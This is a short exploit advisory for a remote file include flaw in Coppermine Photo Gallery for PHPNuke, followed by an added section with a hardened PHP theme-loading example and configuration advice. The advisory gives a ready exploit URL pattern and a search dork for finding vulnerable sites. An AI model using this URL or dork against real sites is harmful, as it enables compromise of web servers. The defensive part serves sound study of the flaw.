--------------------------------------------------------------------------------
Coppermine Photo Gallery v1.2.2b for PHPNUKE (THEME_DIR) Remote File Include Vulnerability
--------------------------------------------------------------------------------
Author: Dr Max Virus
--------------------------------------------------------------------------------
Level: Dangerous
--------------------------------------------------------------------------------
Affected Versions:
1.0 RC3
1.1 beta 2
1.1.0
1.2
1.2.1
1.2.2b
--------------------------------------------------------------------------------
Code in: themes.php
Vul code: require($THEME_DIR."/user_list_info_box.inc");
--------------------------------------------------------------------------------
Exploit:
victim.com/modules/coppermine/themes/default/theme.php?THEME_DIR=evil code
--------------------------------------------------------------------------------
dork: Powered By Coppermine Photo Gallery v1.2.2b / Powered By Coppermine Photo Gallery v1.2.1
--------------------------------------------------------------------------------
Greetz: str0ke-Thehacker-AsianEagle-Nukedx-NETTOXIC-All Ayyildiz Team
--------------------------------------------------------------------------------
# milw0rm.com [2006-09-15]
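
The `require` on `$THEME_DIR` quoted in this advisory is reachable from the URL only when the script lets a request parameter populate that variable, which is assumed here (for example via `register_globals`; the advisory does not say). The hardened pattern below is an added example, not Coppermine's code or the advisory author's; `resolve_theme_dir`, the temporary directory layout and the sample inputs are hypothetical and constructed for the demonstration.

```php
<?php
// Vulnerable pattern from the advisory (kept as a comment, not executed):
//   require($THEME_DIR."/user_list_info_box.inc");
// The script never assigns $THEME_DIR itself, so the request can supply it.

// Hardened form: the theme is selected by name from directories that exist
// under a fixed root; the request never contributes a path or a URL.
function resolve_theme_dir(string $requested, string $themesRoot): ?string
{
    // Accept only a bare directory name: no slashes, dots, schemes or NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }
    $root = realpath($themesRoot);
    $dir  = realpath($themesRoot . DIRECTORY_SEPARATOR . $requested);
    // realpath() returns false for missing paths and resolves symlinks,
    // so the containment check below is made on the real location.
    if ($root === false || $dir === false || !is_dir($dir)) {
        return null;
    }
    if (strncmp($dir, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $dir;
}

// Constructed sample layout so the example runs offline.
$root = sys_get_temp_dir() . '/themes_demo_' . getmypid();
mkdir($root . '/default', 0700, true);
file_put_contents($root . '/default/user_list_info_box.inc', '<?php echo "info box\n";');

// Constructed inputs: one valid theme name and three values that must be rejected.
$inputs = ['default', 'http://example.invalid/x', '../default', 'missing'];
foreach ($inputs as $in) {
    $dir = resolve_theme_dir($in, $root);
    if ($dir === null) {
        echo "rejected: $in\n";
        continue;
    }
    echo "accepted: $in -> ";
    require $dir . '/user_list_info_box.inc';
}

// Remove the constructed layout.
unlink($root . '/default/user_list_info_box.inc');
rmdir($root . '/default');
rmdir($root);
```

Setting `register_globals` and `allow_url_include` to `Off` in `php.ini` is a second layer of defence, not a substitute for validating the value in code.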